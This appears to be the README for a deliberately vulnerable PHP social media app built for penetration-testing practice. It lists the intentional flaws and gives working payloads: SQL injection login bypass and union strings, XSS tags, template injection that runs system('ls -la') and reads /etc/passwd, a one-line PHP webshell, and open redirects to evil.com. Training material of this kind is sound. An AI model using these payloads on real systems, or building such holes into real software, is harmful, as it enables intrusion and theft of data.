A deliberately vulnerable social media application for security testing and educational purposes, built with PHP.

This application contains intentional security vulnerabilities and should ONLY be used for:

• Security testing and penetration testing practice
• Educational purposes to learn about web vulnerabilities
• Security research in controlled environments

NEVER deploy this application in production or expose it to the internet!

• Location: Login, search, and various database queries
• Example: ' OR '1'='1 in login form
• Files: config.php login function, search function

• Location: Post content, user bios, comments
• Example: <script>alert('XSS')</script> in post content
• Files: All PHP files with direct output

• Location: /template.php endpoint
• Example: {7*7} or {phpinfo()}
• Files: template.php

• Location: /upload.php endpoint
• Example: Upload PHP webshell or HTML files
• Files: upload.php

• Location: /redirect.php endpoint
• Example: /redirect.php?url=https://evil.com
• Files: redirect.php

• Location: Profile editing
• Example: Access /edit_profile.php?user_id=1 as any user
• Files: edit_profile.php

• Location: Admin panels and sensitive URLs
• Example: Access /admin_panel.php without authentication
• Files: admin_panel.php, admin_messages.php

• Location: Login system
• Example: Plain text passwords, no session protection
• Files: config.php login function

1. Using Docker Compose (Recommended):

docker-compose up --build

2. Access the application:
   • URL: http://localhost
   • MySQL: localhost:3306

-- Login bypass
' OR '1'='1' --

-- Union-based injection
' UNION SELECT 1,username,password,email,5,6 FROM users --

-- Blind injection
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' --

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

{7*7}
{$_SERVER['HTTP_HOST']}
{phpinfo()}
{system('ls -la')}
{file_get_contents('/etc/passwd')}

• PHP webshell: <?php system($_GET['cmd']); ?>
• HTML with XSS: <script>alert('Uploaded XSS')</script>
• JavaScript file with malicious code

/redirect.php?url=https://evil.com
/redirect.php?url=//evil.com
/redirect.php?url=data:text/html,<script>alert('XSS')</script>

• Access any profile: /profile.php?user_id=1, /profile.php?user_id=2
• Edit any profile: /edit_profile.php?user_id=1, /edit_profile.php?user_id=2

• Admin panel: /admin_panel.php
• Admin messages: /admin_messages.php
• Database backup: /backup.php
• System logs: /logs.php

This application demonstrates:

• No input validation
• No output encoding
• No authentication checks
• No authorization controls
• Insecure file handling
• Weak session management
• Direct object access without validation

Use this app to practice:

• SQL injection exploitation
• XSS payload crafting
• SSTI techniques
• File upload attacks
• Authorization bypass
• Forced browsing attacks
• Security testing methodologies

├── config.php           # Database connection and functions
├── index.php           # Main dashboard
├── login.php           # Login page (SQLi vulnerable)
├── register.php        # Registration page
├── search.php          # Search functionality (SQLi vulnerable)
├── profile.php         # User profiles
├── edit_profile.php    # Profile editing (IDOR vulnerable)
├── template.php        # SSTI vulnerability
├── upload.php          # File upload vulnerability
├── contacts.php        # Contact messages
├── admin_messages.php  # Admin messages (forced browsing)
├── admin_panel.php     # Admin control panel (forced browsing)
├── contact.php         # Contact form
├── .htaccess           # URL rewriting
├── uploads/            # File upload directory
├── Dockerfile          # PHP/Apache container
├── docker-compose.yml  # Docker configuration
└── init.sql           # Database initialization

Educational use only. Not for production deployment.